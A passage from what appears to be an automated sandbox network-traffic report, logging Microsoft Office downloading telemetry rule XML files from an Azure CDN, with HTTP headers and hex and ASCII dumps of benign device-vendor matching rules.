                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                            ETag: "0x8DC582BAC2126A6"
                                            x-ms-request-id: e6e3c96a-a01e-0032-07d4-431949000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085748Z-174f7845968cpnpfhC1EWR3afc00000015c0000000002ycw
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:48 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24192.168.2.44977013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:48 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:48 UTC494INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2980
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                            ETag: "0x8DC582BA80D96A1"
                                            x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085748Z-174f7845968zgtf6hC1EWRqd8s0000000ykg000000008xdz
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:48 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25192.168.2.44977213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:48 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:48 UTC494INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:48 GMT
                                            Content-Type: text/xml
                                            Content-Length: 2160
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                            ETag: "0x8DC582BA3B95D81"
                                            x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085748Z-174f7845968nxc96hC1EWRspw800000015hg0000000014dq
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:48 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192.168.2.44977513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:50 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:51 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                            ETag: "0x8DC582B9F6F3512"
                                            x-ms-request-id: 930937e0-c01e-0046-27a1-402db9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085750Z-174f78459684bddphC1EWRbht400000015c00000000082es
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:51 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192.168.2.44977413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:50 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:51 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 474
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                            ETag: "0x8DC582B9964B277"
                                            x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085750Z-174f78459685m244hC1EWRgp2c00000015mg0000000020d9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192.168.2.44977613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:50 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:51 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 471
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                            ETag: "0x8DC582BB10C598B"
                                            x-ms-request-id: e8c785f0-901e-0048-4ed4-43b800000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085751Z-174f7845968nxc96hC1EWRspw800000015bg000000008gw3
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:51 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192.168.2.44977713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:50 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:51 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 632
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB6E3779E"
                                            x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085751Z-174f7845968cdxdrhC1EWRg0en00000015r0000000002bd3
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:51 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            30192.168.2.44977813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:50 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:51 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 467
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                            ETag: "0x8DC582BA6C038BC"
                                            x-ms-request-id: 8361aa46-901e-008f-73ef-4467a6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085751Z-174f7845968nxc96hC1EWRspw800000015b0000000009n8u
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:51 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            31192.168.2.44977913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:52 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:53 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                            ETag: "0x8DC582BBAD04B7B"
                                            x-ms-request-id: 12c713eb-c01e-0034-6a92-432af6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085753Z-174f78459685m244hC1EWRgp2c00000015mg0000000020e1
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            32192.168.2.44978013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:52 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:53 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB344914B"
                                            x-ms-request-id: 79414491-c01e-0014-1360-43a6a3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085753Z-174f7845968n2hr8hC1EWR9cag00000015cg000000002u4z
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:53 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            33192.168.2.44978113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:53 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:53 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                            ETag: "0x8DC582B9018290B"
                                            x-ms-request-id: e10b9e7c-f01e-0096-7ef3-4410ef000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085753Z-174f7845968kdththC1EWRzvxn0000000k3000000000325m
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:53 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            34192.168.2.44978213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:53 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:53 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                            ETag: "0x8DC582BA310DA18"
                                            x-ms-request-id: 7b1224ad-601e-0097-014f-44f33a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085753Z-174f7845968swgbqhC1EWRmnb400000015ug000000006avx
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
